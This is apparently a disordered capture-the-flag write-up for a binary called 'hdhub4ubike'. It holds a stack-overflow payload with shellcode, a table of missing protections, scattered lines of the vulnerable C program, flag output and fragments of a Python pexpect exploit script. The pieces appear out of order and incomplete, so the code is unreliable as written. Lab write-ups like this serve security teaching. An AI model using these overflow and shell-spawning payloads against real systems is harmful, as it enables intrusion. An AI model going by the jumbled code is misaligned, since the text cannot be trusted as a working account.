payload = b'A'*64 + b'B'*8 + struct.pack("<Q", 0x7fffffffe000) # address of our buffer (approx) payload = payload.ljust(0x100, b'\x90') + shellcode Running the payload spawns an interactive shell on the remote target. | Topic | What we observed in hdhub4ubike | |---------------------------|-----------------------------------| | Stack overflow | read with a length far larger than the buffer → classic overflow vector. | | Non‑PIE binaries | Fixed addresses make ROP/simple return‑to‑code trivial. | | NX disabled | Allows injection of raw shellcode on the stack. | | No canary / RELRO | Nothing blocks overwriting the saved RIP. | | Info leakage | The flag was embedded in the binary – a “cheat” that encourages bypassing logic checks. | | Best exploitation path | Return‑to‑existing puts that already has the flag address set → shortest payload, no need for ROP chain or shellcode. | 6️⃣ Full Exploit Script (Python 3) #!/usr/bin/env python3 import struct, pexpect, sys
/* ---------------------------------------------------- */ int check_key(const char *key) // key must be exactly 0x30 bytes long if (strlen(key) != 0x30) return 0;
int main(void) char buf[64]; puts("=== Welcome to the HD Bike Hub ==="); printf("Enter your hub key: ");
=== Welcome to the HD Bike Hub === Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3 Success! The flag is printed without ever passing the check_key test. If you prefer a “classic” shellcode approach, you can place a /bin/sh payload on the stack and return to it.
// vulnerable read – no length limit! read(0, buf, 0x100); // <‑‑ overflow possible
BIN = "./hdhub4ubike" TARGET_ADDR = 0x004011a6 # address of the "puts" call that prints the flag
return 1;
p.sendline(payload.decode('latin-1')) # send as a line p.interact() # hand over the terminal